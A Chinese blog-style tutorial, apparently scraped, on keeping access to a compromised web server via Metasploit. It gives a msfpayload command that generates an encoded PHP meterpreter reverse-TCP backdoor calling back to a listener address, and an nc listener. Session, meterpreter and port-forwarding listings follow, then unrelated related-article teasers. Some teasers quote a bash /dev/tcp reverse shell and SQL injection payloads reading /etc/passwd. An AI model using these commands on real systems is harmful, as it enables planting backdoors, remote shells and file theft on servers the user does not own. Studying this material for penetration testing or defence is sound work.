1、前期--

情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用

启动PostgreSQL服务:service postgresql start

启动metasploit服务:service metasploit start

启动msfconsole:msfconsole

查看数据库连接状态:db_status

生成后门文件

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT= R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

exp.php需要加上<?php  ?>

攻击端启动监听

或者

nc 192.168.133.128 -lvp

然后去访问我们的后门文件

2、大家想保存我们得到的session怎么办?首先必须连接数据库

exploit -h

 -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.  有效负载编码,默认使用

    -f        Force the exploit to run regardless of the value of MinimumRank.

    -h        Help banner.

    -j        Run in the context of a job.  在后台中运行

    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.

    -o <opt>  A comma separated list of options in VAR=VAL format.

    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.

    -t <opt>  The target index to use.  If none is specified, TARGET is used.

    -z        Do not interact with the session after successful exploitation  建立会话放到后台
sessions -h

    -K        Terminate all sessions  杀死所有sessions

    -c <opt>  Run a command on the session given with -i, or all 执行一个命令

    -d <opt>  Detach an interactive session

    -h        Help banner

    -i <opt>  Interact with the supplied session ID   连接会话

    -k <opt>  Terminate sessions by session ID and/or range

    -l        List all active sessions

    -q        Quiet mode

    -r        Reset the ring buffer for the session given with -i, or all

    -s <opt>  Run a script on the session given with -i, or all

    -t <opt>  Set a response timeout (default: )

    -u <opt>  Upgrade a shell to a meterpreter session on many platforms

    -v        List verbose fields

3、meterpreter使用

Core Commands 代码命令

=============

    Command                   Description

    -------                   -----------

    ?                         Help menu  查看帮助

    background                Backgrounds the current session 将sessions保存到后台

    bgkill                    Kills a background meterpreter script  杀死后台meterpreter脚本

    bglist                    Lists running background scripts 列出后台meterpreter脚本

    bgrun                     Executes a meterpreter script as a background thread   在后台进程中执行一个脚本

    channel                   Displays information about active channels  显示活动的通道

    close                     Closes a channel  关闭通道

    disable_unicode_encoding  Disables encoding of unicode strings

    enable_unicode_encoding   Enables encoding of unicode strings

    exit                      Terminate the meterpreter session  退出

    help                      Help menu

    info                      Displays information about a Post module

    interact                  Interacts with a channel

    irb                       Drop into irb scripting mode  开启ruby终端

    load                      Load one or more meterpreter extensions

    quit                      Terminate the meterpreter session

    read                      Reads data from a channel

    resource                  Run the commands stored in a file

    run                       Executes a meterpreter script or Post module

    use                       Deprecated alias for 'load'

    write                     Writes data to a channel

Stdapi: File system Commands  文件命令

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands 网络命令

===========================

    Command       Description

    -------       -----------

    portfwd       Forward a local port to a remote service  端口转发
   portfwd  add -l 5555 -p 3389 -r 192.168.198.129  将192.168.198.129的3389端口转发到本地的5555端口

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command  执行命令

    getenv        Get one or more environment variable values

    getpid        Get the current process identifier

    getuid        Get the user that the server is running as

    kill          Terminate a process

    ps            List running processes

    shell         Drop into a system command shell  生成一个shell

    sysinfo       Gets information about the remote system, such as OS  查看系统信息

附上:初探meterpreter

msfpayload反弹shell的更多相关文章

  1. 内网渗透中的反弹Shell与端口转发

    from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...

  2. Linux下反弹shell的种种方式

    [前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...

  3. NC / Netcat - 反弹Shell

    原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>n ...

  4. 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

    SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...

  5. linux反弹shell

    参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...

  6. python shell与反弹shell

    python shell与反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端, ...

  7. linux下反弹shell

    01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali        ...

  8. golang写的反弹shell(自作孽不可活,切记,切记!)

    仅作安全研究 package main import ( "os/exec" "go-pop3" "log" "strings&q ...

  9. 使用DnsCat反弹shell

    DnsCat技术特点 Dns隧道反弹shell DnsCat服务器的安装 #git clone https://github.com/iagox86/dnscat2.git #cd dnscat2 # ...

随机推荐

  1. @Primary 注解引出的问题

    @Primary 注解 刚看到这个,还以为是持久层的注解呢,以为和@Id差不多,一查才知道,这两个风马牛不相及,反倒和@Qualifier以及@Resource有点像了,但是相比而言,后面两个更加的灵 ...

  2. mybatis的setting

    在mybaits中,setting的的配置参数如下(如果不在配置文件中配置将使用默认值): 设置参数 描述 有效值 默认值 cacheEnabled 该配置影响的所有映射器中配置的缓存的全局开关 tr ...

  3. DAY6-Flask项目

    1.ViewModel:处理原始数据:裁剪修饰合并 2.访问静态资源 默认情况下,访问的路径为app根目录的下的static文件,为什么说app是根目录而不是fisher.py下,因为在实例化对象的时 ...

  4. Netty基础系列(3) --彻底理解NIO

    前言 上一节中我们提到了同步异步与阻塞非阻塞的区别,知道了同步并不等于阻塞.而本节的主角NIO是一种同步非阻塞的I/O模型,并且是I/O多路复用模型.NIO在java中被称为 New I/O.它并不能 ...

  5. BZOJ 3498 PA2009 Cakes

    本题BZOJ权限题,但在bzojch上可以看题面. 题意: N个点m条无向边,每个点有一个点权a. 对于任意一个三元环(i,j,k)(i<j<k),它的贡献为max(ai,aj,ak) 求 ...

  6. python使用SMTP发送qq/sina邮件

    python使用qq邮箱(个人邮箱)发送邮件需开启qq邮箱的SMTP服务 在设置中开启pop3/SMTP服务,返回的密码就是之后代码中登录使用账户密码(在完整代码中标识了出来) 之后出现如下错误 sm ...

  7. [BZOJ3230] 相似字串 后缀数组+RMQ

    3230: 相似子串 Time Limit: 20 Sec  Memory Limit: 128 MB Description Input 输入第1行,包含3个整数N,Q.Q代表询问组数.第2行是字符 ...

  8. Vue使用SCSS进行模块化开发

    原文地址:http://www.cnblogs.com/JimmyBright/p/7761531.html 个人认为scss最大的好处就是能将css属性设置为变量,这样让css一键更换主题成为可能. ...

  9. 51nod 1376 最长上升子序列的数量 | DP | vector怒刷存在感!

    51nod 1376 最长上升子序列的数量 题解 我们设lis[i]为以位置i结尾的最长上升子序列长度,dp[i]为以位置i结尾的最长上升子序列数量. 显然,dp[i]要从前面的一些位置(设为位置j) ...

  10. 3Sum - LeetCode

    目录 题目链接 注意点 解法 小结 题目链接 3Sum - LeetCode 注意点 和two sum那道题不一样的是这题返回的是具体的数字,不是下标 解法 解法一:将每个数字都作为target,剩下 ...